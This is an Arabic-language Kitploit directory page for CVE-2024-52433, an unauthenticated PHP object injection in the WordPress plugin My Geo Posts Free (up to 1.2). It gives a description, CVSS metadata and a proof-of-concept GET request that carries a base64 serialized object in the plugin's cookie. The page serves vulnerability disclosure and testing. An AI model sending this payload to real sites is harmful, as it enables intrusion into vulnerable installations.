Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-52433 — My Geo Posts Free <= 1.2 - حقن كائنات PHP بدون مصادقة | Kitploit
أدوات/GitHubGitHub/randomrobbiebf/cve-2024-52433
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubrandomrobbiebf/cve-2024-52433

CVE-2024-52433

My Geo Posts Free <= 1.2 - حقن كائنات PHP بدون مصادقة

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-52433

My Geo Posts Free <= 1.2 - حقن كائن PHP غير مصادق عليه

الوصف

إضافة My Geo Posts Free لـ WordPress معرضة لثغرة حقن كائن PHP في الإصدارات حتى 1.2 ضمناً، وذلك عبر إلغاء تسلسل مدخلات غير موثوقة. وهذا يتيح للمهاجمين غير المصادقين حقن كائن PHP. لا توجد سلسلة POP معروفة في البرنامج المعرض للخطر. إذا وُجدت سلسلة POP عبر إضافة أو قالب إضافي مثبت على النظام المستهدف، فقد تسمح للمهاجم بحذف ملفات عشوائية، أو استرجاع بيانات حساسة، أو تنفيذ كود.

رابط التحميل: تحميل my-geo-posts-free الإصدار 1.2

root@kitploit:~
Type: plugin
CVSS Score: 9.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE: CVE-2024-52433
Slug: my-geo-posts-free

POC

root@kitploit:~
GET / HTTP/2
Host: wp-dev.ddev.site
Cookie: mgpf_geo_coockie=TzoyMDoiUEhQX09iamVjdF9JbmplY3Rpb24iOjA6e30=
تنزيل الأداة